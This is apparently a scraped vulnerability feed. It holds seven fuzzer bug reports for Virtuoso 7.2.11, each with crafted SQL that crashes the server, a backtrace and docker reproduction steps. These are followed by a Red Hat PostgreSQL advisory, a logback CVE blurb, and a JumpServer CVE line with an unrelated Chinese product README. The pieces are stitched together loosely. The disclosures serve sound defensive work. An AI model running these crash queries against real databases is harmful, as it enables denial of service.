An issue in the box_mpy function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT ) ; 
  INSERT INTO v0 VALUES ( 2147483647 ) ; 
  INSERT INTO v0 VALUES ( \-1 ) ; 
  INSERT INTO v0 ( v1 , v1 , v1 ) SELECT 54 , v1 , \-128 FROM v0 AS v4 , v0 , v0 AS v3 NATURAL JOIN v0 AS v2 ; 
  UPDATE v0 SET v1 \= NULL WHERE ( v1 \* 2147483647 , CASE WHEN v1 \= 'x' THEN 75 WHEN DENSE\_RANK ( 'x' ) THEN 25942677.000000 END + 16 \* 127 ) IN ( SELECT v1 FROM v0 WHERE v1 \>= 127 AND ( v1 \* 16 , v1 , ( SELECT v1 FROM v0 WHERE ( v1 , v1 ) IN ( SELECT v1 , v1 AS v8 FROM v0 AS v6 NATURAL JOIN v0 AS v7 NATURAL JOIN v0 AS v5 NATURAL JOIN v0 WHERE v1 ) ORDER BY v1 ) ) \- 'x' GROUP BY 48002391.000000 ) ; 

backtrace:

#0 0xc201b3 (box\_mpy+0x83)
#1 0x754c6e (code\_vec\_run\_v+0x19be)
#2 0x7b86bb (end\_node\_input+0x13b)
#3 0x7af05e (qn\_input+0x3ce)
#4 0x7af78f (qn\_ts\_send\_output+0x23f)
#5 0x7b509e (table\_source\_input+0x16ee)
#6 0x7af05e (qn\_input+0x3ce)
#7 0x44c979 (chash\_fill\_input+0x589)
#8 0x5370af (hash\_fill\_node\_input+0xef)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x44c52e (chash\_fill\_input+0x13e)
#12 0x5370af (hash\_fill\_node\_input+0xef)
#13 0x7af05e (qn\_input+0x3ce)
#14 0x7af4c6 (qn\_send\_output+0x236)
#15 0x44c52e (chash\_fill\_input+0x13e)
#16 0x5370af (hash\_fill\_node\_input+0xef)
#17 0x7af05e (qn\_input+0x3ce)
#18 0x7af4c6 (qn\_send\_output+0x236)
#19 0x8214bd (set\_ctr\_vec\_input+0x99d)
#20 0x7af05e (qn\_input+0x3ce)
#21 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#22 0x7ce602 (sf\_sql\_execute+0x15d2)
#23 0x7cecde (sf\_sql\_execute\_w+0x17e)
#24 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#25 0xe214bc (future\_wrapper+0x3fc)
#26 0xe28dbe (\_thread\_boot+0x11e)
#27 0x7fa2b8a15609 (start\_thread+0xd9)
#28 0x7fa2b87e5133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48946: Fuzzer: Virtuoso 7.2.11 crashed at box_mpy · Issue #1178 · openlink/virtuoso-opensource

An issue in the box_col_len function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

    CREATE TABLE v0 ( v1 nvarchar ) ; 
     INSERT INTO v0 VALUES ( 1 ) ; 
     INSERT INTO v0 SELECT MAX ( DISTINCT v1 ) FROM v0 ; 
     INSERT INTO v0 SELECT v1 FROM v0 WHERE ( SELECT ( SELECT v1 FROM v0 ) ) ; 
    

backtrace:

    #0 0x86df90 (box_col_len+0x90)
    #1 0x88c0af (key_vec_insert+0x9df)
    #2 0x7b679b (insert_node_run+0x8fb)
    #3 0x7b6b1c (insert_node_input+0x11c)
    #4 0x7af05e (qn_input+0x3ce)
    #5 0x7af78f (qn_ts_send_output+0x23f)
    #6 0x7b509e (table_source_input+0x16ee)
    #7 0x7af05e (qn_input+0x3ce)
    #8 0x7af4c6 (qn_send_output+0x236)
    #9 0x8214bd (set_ctr_vec_input+0x99d)
    #10 0x7af05e (qn_input+0x3ce)
    #11 0x7c1be9 (qr_dml_array_exec+0x839)
    #12 0x7ce602 (sf_sql_execute+0x15d2)
    #13 0x7cecde (sf_sql_execute_w+0x17e)
    #14 0x7d799d (sf_sql_execute_wrapper+0x3d)
    #15 0xe214bc (future_wrapper+0x3fc)
    #16 0xe28dbe (_thread_boot+0x11e)
    #17 0x7ff3d19ba609 (start_thread+0xd9)
    #18 0x7ff3d178a133 (clone+0x43)
    

ways to reproduce (write poc to the file /tmp/test.sql first):

    # remove the old one
    docker container rm virtdb_test -f
    # start virtuoso through docker
    docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
    # wait the server starting
    sleep 10
    # check whether the simple query works
    echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
    # run the poc
    cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba

CVE-2023-48950: Fuzzer: Virtuoso 7.2.11 crashed at box_col_len · Issue #1174 · openlink/virtuoso-opensource

A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 DECIMAL ) ; 
  INSERT INTO v0 VALUES ( 0 ) ; 
  INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE \-128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; 
  UPDATE v0 SET v1 \= ( SELECT DISTINCT \* FROM v0 ) ; 

Server Log:

    14:21:24 HTTP/WebDAV server online at 8890
    14:21:24 Server online at 1111 (pid 1)
    *** stack smashing detected ***: terminated
    

Due to the stack smashing, I failed to retrieve the correct backtrace.

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource

An issue in the cha_cmp function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT ) ;
 INSERT INTO v0 ( v1 , v1 , v1 ) VALUES ( 77 , \-128 , \-1 ) ;
 INSERT INTO v0 VALUES ( 4 ) ;
 SELECT CASE \-128 / 56 WHEN v1 THEN 20 ELSE v1 + \-2147483648 END , v1 FROM v0 UNION SELECT 19 , 0 \* v1 FROM v0 GROUP BY v1 ;

backtrace:

#0 0x42c769 (cha\_cmp+0x69)
#1 0x4339cf (setp\_chash\_distinct\_run+0x1dcf)
#2 0x434478 (setp\_chash\_distinct+0x3b8)
#3 0x63bdc3 (setp\_node\_run+0xe3)
#4 0x63cc23 (setp\_node\_input+0x33)
#5 0x7af05e (qn\_input+0x3ce)
#6 0x7af78f (qn\_ts\_send\_output+0x23f)
#7 0x437069 (chash\_read\_input+0x1029)
#8 0x7af05e (qn\_input+0x3ce)
#9 0x7af4c6 (qn\_send\_output+0x236)
#10 0x7af05e (qn\_input+0x3ce)
#11 0x63d1c3 (union\_node\_input+0x1d3)
#12 0x7518c7 (qr\_resume\_pending\_nodes+0x197)
#13 0x751c9a (subq\_next+0x1ba)
#14 0x821acb (subq\_node\_vec\_input+0x2eb)
#15 0x7af05e (qn\_input+0x3ce)
#16 0x7af4c6 (qn\_send\_output+0x236)
#17 0x8214bd (set\_ctr\_vec\_input+0x99d)
#18 0x7af05e (qn\_input+0x3ce)
#19 0x7c084b (qr\_exec+0x11db)
#20 0x7ce1d6 (sf\_sql\_execute+0x11a6)
#21 0x7cecde (sf\_sql\_execute\_w+0x17e)
#22 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#23 0xe214bc (future\_wrapper+0x3fc)
#24 0xe28dbe (\_thread\_boot+0x11e)
#25 0x7f14fb425609 (start\_thread+0xd9)
#26 0x7f14fb1f5133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48947: Fuzzer: Virtuoso 7.2.11 crashed at cha_cmp · Issue #1179 · openlink/virtuoso-opensource

An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ;
 INSERT INTO v0 VALUES ( 20 , \-1 ) ;
 SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + \-1 \* 40 ;

backtrace:

#0 0x876418 (box\_deserialize\_reusing+0x38)
#1 0x87917e (sslr\_qst\_get+0x46e)
#2 0x81f2f6 (select\_node\_input\_vec+0x656)
#3 0x7ba667 (select\_node\_input+0xa7)
#4 0x7af05e (qn\_input+0x3ce)
#5 0x7af78f (qn\_ts\_send\_output+0x23f)
#6 0x7b509e (table\_source\_input+0x16ee)
#7 0x7af05e (qn\_input+0x3ce)
#8 0x7af4c6 (qn\_send\_output+0x236)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x8214bd (set\_ctr\_vec\_input+0x99d)
#12 0x7af05e (qn\_input+0x3ce)
#13 0x7c084b (qr\_exec+0x11db)
#14 0x7ce1d6 (sf\_sql\_execute+0x11a6)
#15 0x7cecde (sf\_sql\_execute\_w+0x17e)
#16 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#17 0xe214bc (future\_wrapper+0x3fc)
#18 0xe28dbe (\_thread\_boot+0x11e)
#19 0x7fca3837c609 (start\_thread+0xd9)
#20 0x7fca3814c133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48952: Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing · Issue #1175 · openlink/virtuoso-opensource

An issue in the box_div function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INTEGER NOT NULL PRIMARY KEY ) ; 
  INSERT INTO v0 VALUES ( 95 ) ; 
  INSERT INTO v0 VALUES ( ( SELECT ( \-1 , \-1 ) \* ( 31 , 84 ) FROM v0 WHERE v1 BETWEEN 'x' AND 'x' OR EXISTS ( SELECT v1 FROM v0 WHERE v1 NOT IN ( SELECT 20 FROM v0 WHERE ( v1 \> 2147483647 AND v1 < 271514.000000 ) ) ) ) ) ; 
  INSERT INTO v0 SELECT v1 + v1 + v1 FROM v0 ORDER BY v1 ; 
  INSERT INTO v0 VALUES ( ( SELECT ( 34 , 16 ) \* ( 41 , \-128 ) FROM v0 WHERE v1 BETWEEN 'x' AND 'x' OR EXISTS ( SELECT v1 FROM v0 WHERE v1 + v1 \* 24 / 50820962.000000 \- 0 / 86183090.000000 IN ( SELECT DISTINCT v1 FROM v0 WHERE 'x' OR ( ( ( v1 / 0 ) ) \[ 35 \] ) \* 16 BETWEEN 'x' AND 'x' GROUP BY v1 , v1 ) ) ) ) ; 

backtrace:

#0 0xc210f3 (box\_div+0x83)
#1 0x754f4e (code\_vec\_run\_v+0x1c9e)
#2 0x7b86bb (end\_node\_input+0x13b)
#3 0x7af05e (qn\_input+0x3ce)
#4 0x7af78f (qn\_ts\_send\_output+0x23f)
#5 0x7b509e (table\_source\_input+0x16ee)
#6 0x7af05e (qn\_input+0x3ce)
#7 0x44c979 (chash\_fill\_input+0x589)
#8 0x5370af (hash\_fill\_node\_input+0xef)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x8214bd (set\_ctr\_vec\_input+0x99d)
#12 0x7af05e (qn\_input+0x3ce)
#13 0x751d38 (subq\_next+0x258)
#14 0x8201a2 (ins\_vec\_subq+0x2a2)
#15 0x753c6b (code\_vec\_run\_v+0x9bb)
#16 0x7b8737 (end\_node\_input+0x1b7)
#17 0x7af05e (qn\_input+0x3ce)
#18 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#19 0x7ce602 (sf\_sql\_execute+0x15d2)
#20 0x7cecde (sf\_sql\_execute\_w+0x17e)
#21 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#22 0xe214bc (future\_wrapper+0x3fc)
#23 0xe28dbe (\_thread\_boot+0x11e)
#24 0x7ff8b497a609 (start\_thread+0xd9)
#25 0x7ff8b474a133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48948: Fuzzer: Virtuoso 7.2.11 crashed at box_div · Issue #1176 · openlink/virtuoso-opensource

An issue in the box_add function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 FLOAT UNIQUE , v2 INT ) ;
 INSERT INTO v0 VALUES ( NULL , 57 ) ;
 INSERT INTO v0 VALUES ( \-1 , ( SELECT 60 , v2 FROM v0 WHERE v2 \= \-1 ) ) ;
 UPDATE v0 SET v1 \= ( CASE WHEN v2 \* v1 THEN 76 ELSE ( SELECT v2 FROM v0 WHERE v1 \= \-2147483648 / CASE WHEN v2 \= ( SELECT v1 FROM v0 WHERE ( CASE WHEN v2 \= v2 AND v2 \= v2 AND v2 THEN v2 + v1 \* \-128 + 48100742.000000 END ) IN ( SELECT v1 FROM v0 WHERE v2 BETWEEN 'x' AND 'x' OR ( CASE WHEN v2 \= 16 THEN 46 ELSE v1 + ( 69175744.000000 , 10962973.000000 ) / 36 + 5 END ) GROUP BY 'x' ) ORDER BY v2 / 45 DESC ) THEN 32232158.000000 END ) END ) ;

backtrace:

#0 0xc1e333 (box\_add+0x83)
#1 0x75e0ba (code\_vec\_run\_no\_catch+0xe5a)
#2 0x8966e5 (itc\_vec\_row\_check+0x8e5)
#3 0x617353 (itc\_page\_search+0xc13)
#4 0x61345f (itc\_search+0x84f)
#5 0x896de4 (itc\_vec\_next+0x364)
#6 0x7b2565 (ks\_start\_search+0xf75)
#7 0x7b434e (table\_source\_input+0x99e)
#8 0x7af05e (qn\_input+0x3ce)
#9 0x44c979 (chash\_fill\_input+0x589)
#10 0x5370af (hash\_fill\_node\_input+0xef)
#11 0x7af05e (qn\_input+0x3ce)
#12 0x7af4c6 (qn\_send\_output+0x236)
#13 0x8214bd (set\_ctr\_vec\_input+0x99d)
#14 0x7af05e (qn\_input+0x3ce)
#15 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#16 0x7ce602 (sf\_sql\_execute+0x15d2)
#17 0x7cecde (sf\_sql\_execute\_w+0x17e)
#18 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#19 0xe214bc (future\_wrapper+0x3fc)
#20 0xe28dbe (\_thread\_boot+0x11e)
#21 0x7f7e10239609 (start\_thread+0xd9)
#22 0x7f7e10009133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48949: Fuzzer: Virtuoso 7.2.11 crashed at box_add · Issue #1173 · openlink/virtuoso-opensource

Red Hat Security Advisory 2023-7545-01 - An update for postgresql is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7545.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql security update  
Advisory ID:        RHSA-2023:7545-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7545  
Issue date:         2023-11-28  
Revision:           01  
CVE Names:          CVE-2022-2625  
====================================================================

Summary: 

An update for postgresql is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes (CVE-2023-2454)

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Extension scripts replace objects not belonging to the extension. (CVE-2022-2625)

* postgresql: row security policies disregard user ID changes after inlining. (CVE-2023-2455)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Client memory disclosure when connecting with Kerberos to modified server (CVE-2022-41862)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-2625

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2113825  
https://bugzilla.redhat.com/show_bug.cgi?id=2165722  
https://bugzilla.redhat.com/show_bug.cgi?id=2207568  
https://bugzilla.redhat.com/show_bug.cgi?id=2207569  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7545-01

A serialization vulnerability in logback receiver component part of 
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service 
attack by sending poisoned data.



CVE-2023-6378: News

Insecure Permissions vulnerability in JumpServer GPLv3 v.3.8.0 allows a remote attacker to execute arbitrary code via bypassing the command filtering function.

**广受欢迎的开源堡垒机**

   

9 年时间，倾情投入，用心做好一款开源堡垒机。

JumpServer 是广受欢迎的开源堡垒机，是符合 4A 规范的专业运维安全审计系统。

JumpServer 堡垒机帮助企业以更安全的方式管控和登录各种类型的资产，包括：

*   **SSH**: Linux / Unix / 网络设备 等；
*   **Windows**: Web 方式连接 / 原生 RDP 连接；
*   **数据库**: MySQL / MariaDB / PostgreSQL / Oracle / SQLServer / ClickHouse 等；
*   **NoSQL**: Redis / MongoDB 等；
*   **GPT**: ChatGPT 等;
*   **云服务**: Kubernetes / VMware vSphere 等;
*   **Web 站点**: 各类系统的 Web 管理后台；
*   **应用**: 通过 Remote App 连接各类应用。

**产品特色**

*   **开源**: 零门槛，线上快速获取和安装；
*   **无插件**: 仅需浏览器，极致的 Web Terminal 使用体验；
*   **分布式**: 支持分布式部署和横向扩展，轻松支持大规模并发访问；
*   **多云支持**: 一套系统，同时管理不同云上面的资产；
*   **多租户**: 一套系统，多个子公司或部门同时使用；
*   **云端存储**: 审计录像云端存储，永不丢失；

**UI 展示**

**在线体验**

*   环境地址：https://demo.jumpserver.org/

⚠️ 注意

该环境仅作体验目的使用，我们会定时清理、重置数据！

请勿修改体验环境用户的密码！

请勿在环境中添加业务生产环境地址、用户名密码等敏感信息！

**快速开始**

*   快速入门
*   产品文档
*   在线学习
*   知识库

**案例研究**

*   腾讯音乐娱乐集团：基于JumpServer的安全运维审计解决方案
*   腾讯海外游戏：基于JumpServer构建游戏安全运营能力
*   万华化学：通过JumpServer管理全球化分布式IT资产，并且实现与云管平台的联动
*   雪花啤酒：JumpServer堡垒机使用体会
*   顺丰科技：JumpServer 堡垒机护航顺丰科技超大规模资产安全运维
*   沐瞳游戏：通过JumpServer管控多项目分布式资产
*   携程：JumpServer 堡垒机部署与运营实战
*   大智慧：JumpServer 堡垒机让“大智慧”的混合 IT 运维更智慧
*   小红书：JumpServer 堡垒机大规模资产跨版本迁移之路
*   中手游：JumpServer堡垒机助力中手游提升多云环境下安全运维能力
*   中通快递：JumpServer主机安全运维实践
*   东方明珠：JumpServer高效管控异构化、分布式云端资产
*   江苏农信：JumpServer堡垒机助力行业云安全运维

**社区交流**

如果您在使用过程中有任何疑问或对建议，欢迎提交 GitHub Issue。

您也可以到我们的 社区论坛 当中进行交流沟通。

**参与贡献**

欢迎提交 PR 参与贡献。 参考 CONTRIBUTING.md

**组件项目**

项目

状态

描述

Lina

JumpServer Web UI 项目

Luna

JumpServer Web Terminal 项目

KoKo

JumpServer 字符协议 Connector 项目

Lion

JumpServer 图形协议 Connector 项目，依赖 Apache Guacamole

Razor

JumpServer RDP 代理 Connector 项目

Tinker

JumpServer 远程应用 Connector 项目

Magnus

JumpServer 数据库代理 Connector 项目

Chen

JumpServer Web DB 项目，替代原来的 OmniDB

Kael

JumpServer 连接 GPT 资产的组件项目

Wisp

JumpServer 各系统终端组件和 Core API 通信的组件项目

Clients

JumpServer 客户端 项目

Installer

JumpServer 安装包 项目

**安全说明**

JumpServer是一款安全产品，请参考 基本安全建议 进行安装部署。如果您发现安全相关问题，请直接联系我们：

*   邮箱：support@fit2cloud.com
*   电话：400-052-0755

**License & Copyright**

Copyright (c) 2014-2023 飞致云 FIT2CLOUD, All rights reserved.

Licensed under The GNU General Public License version 3 (GPLv3) (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

https://www.gnu.org/licenses/gpl-3.0.html

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an " AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Tag

#sql